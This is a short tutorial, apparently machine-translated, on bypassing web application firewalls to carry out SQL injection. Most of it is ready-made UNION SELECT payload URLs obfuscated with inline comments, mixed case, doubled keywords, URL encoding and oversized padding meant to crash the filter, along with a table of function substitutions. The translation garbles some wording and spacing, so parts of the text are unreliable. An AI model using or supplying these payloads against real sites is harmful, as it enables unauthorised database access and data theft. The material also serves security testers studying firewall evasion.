WAF Introduction
What is WAF?
Web Application Firewall is a product that provides protection for Web applications by executing a series of HTTP/HTTPS security policies.
Basic/simple bypass method:
1. annotator
Http://www.site.com/index.php? Page_id =-15 /*! UNION *//*! SELECT */1, 2, 4 ....
2. Use Case
Http://www.site.com/index.php? Page_id =-15 uNIoN sELecT 1, 2, 4 ....
3. Combine the previous two methods
Http://www.site.com/index.php? Page_id =-15 /*! UNIOn *//*! SelECt */1, 2, 4 ....
4. Keyword replacement
Http://www.site.com/index.php? Page_id =-15 UNIunionON SELselectECT 1, 2, 3, 4 ....
This method is applicable to some WAF that replaces the union select statement. After the WAF filter, it will become the union select 1, 2, 3, 4 ....
5. Internal comments
Http://www.site.com/index.php? Page_id =-15% 55 nION/**/% 53 ElecT...
Replace U with % 55, S with % 53 and add comments between union and select /**/
Advanced Bypass Method:
1. Buffer overflow/firewall crash
Most firewalls are developed based on C/C ++. We can use buffer overflow to crash with WAF.
A http://www.bkjia.com/index. php? Page_id =-15 + and + (select1) = (Select 0xAA [... (add about 1000 "A") ..]) + /*! UNIOn */+ /*! SeLECt */+ 1, 2, 4 ....
You can test WAF using the following method:
? Page_id = null % 0A /**//*! 50000% 55nIOn * // * yoyu */all/**/% 0A /*! % 53eLEct */% 0A/* nnaa */+ 1, 2, 3, 4 ....
If the 500 error is returned, you can use the buffer overflow method to bypass WAF.
2. encode letters
Http://www.site.com/index.php? Page_id =-15 /*! U % 6eion *//*! Se % 6cect */1, 2, 3, 4 ....
3. Replace the injection statement with other variables or commands.
COMMAND | WHAT TO USE INSTEAD
@ Version | version ()
Concat () | concat_ws ()
Group_concat () | concat_ws ()
4. Use WAF's own functions to bypass
If you find that WAF replaces "*" with null, you can bypass this feature.
Http://www.site.com/index.php? Page_id =-15 + uni * on + sel * ect + 1, 2, 3, 4 ....
Other methods:-15 + (uNioN) + (sElECt ).... -15 + (uNioN + SeleCT) +... -15 + (UnI) (oN) + (SeL) (ecT) + .... -15 + union (select 1, 2, 4 ...)